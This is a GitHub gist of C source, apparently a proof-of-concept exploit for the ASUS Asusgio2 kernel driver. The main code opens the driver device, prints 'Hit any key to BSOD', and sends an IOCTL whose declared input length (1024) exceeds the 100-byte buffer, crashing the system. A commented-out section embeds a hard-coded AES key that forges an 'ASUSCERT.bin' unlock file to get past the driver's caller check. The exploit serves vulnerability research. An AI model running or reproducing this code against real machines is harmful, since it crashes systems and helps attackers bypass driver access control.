Skip to content

Instantly share code, notes, and snippets.

@hfiref0x

hfiref0x/asusgio2.c

Created Feb 19, 2020
Embed
What would you like to do?
AsIO2
NTSTATUS CallDriver(
_In_ HANDLE DeviceHandle,
_In_ ULONG IoControlCode,
_In_ PVOID InputBuffer,
_In_ ULONG InputBufferLength,
_In_opt_ PVOID OutputBuffer,
_In_opt_ ULONG OutputBufferLength)
{
BOOL bResult = FALSE;
IO_STATUS_BLOCK ioStatus;
return NtDeviceIoControlFile(DeviceHandle,
NULL,
NULL,
NULL,
&ioStatus,
IoControlCode,
InputBuffer,
InputBufferLength,
OutputBuffer,
OutputBufferLength);
}
BOOL supWriteBufferToFile(
_In_ LPWSTR lpFileName,
_In_ PVOID Buffer,
_In_ DWORD BufferSize
)
{
HANDLE hFile;
DWORD bytesIO;
hFile = CreateFileW(lpFileName,
GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
return FALSE;
}
WriteFile(hFile, Buffer, BufferSize, &bytesIO, NULL);
CloseHandle(hFile);
return (bytesIO == BufferSize);
}
int main()
{
//
// Uncomment to generate unlocking resource.
//
/*
AES_ctx ctx;
DWORD a[4] = { 0x16157EAA, 0xA6D2AE28, 0x8815F7AB, 0x3C4FCF09 };
BYTE Buffer[16];
AES_init_ctx(&ctx, (uint8_t*)a);
LARGE_INTEGER fileTime;
ULONG seconds = 0;
GetSystemTimePreciseAsFileTime((PFILETIME)&fileTime);
RtlTimeToSecondsSince1970(&fileTime, &seconds);
RtlSecureZeroMemory(&Buffer, sizeof(Buffer));
RtlCopyMemory(Buffer, &seconds, sizeof(DWORD));
AES_ECB_encrypt(&ctx, (uint8_t*)Buffer);
supWriteBufferToFile((LPWSTR)L"ASUSCERT.bin", Buffer, sizeof(Buffer));
return;
*/
HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\Asusgio2"),
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
0,
NULL);
if (deviceHandle == INVALID_HANDLE_VALUE) {
printf_s("[!] Unable to open device\r\n");
return -1;
}
else {
printf_s("[+] Asusgio2 device opened\r\n");
}
printf_s("[+] Hit any key to BSOD\r\n");
system("pause");
UCHAR dBuffer[100];
NTSTATUS ntStatus = CallDriver(deviceHandle,
0xA0402450,
&dBuffer,
1024,
NULL,
0);
if (!NT_SUCCESS(ntStatus)) {
printf_s("[!] Failed, NTSTATUS (0x%lX)\r\n", ntStatus);
}
CloseHandle(deviceHandle);
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.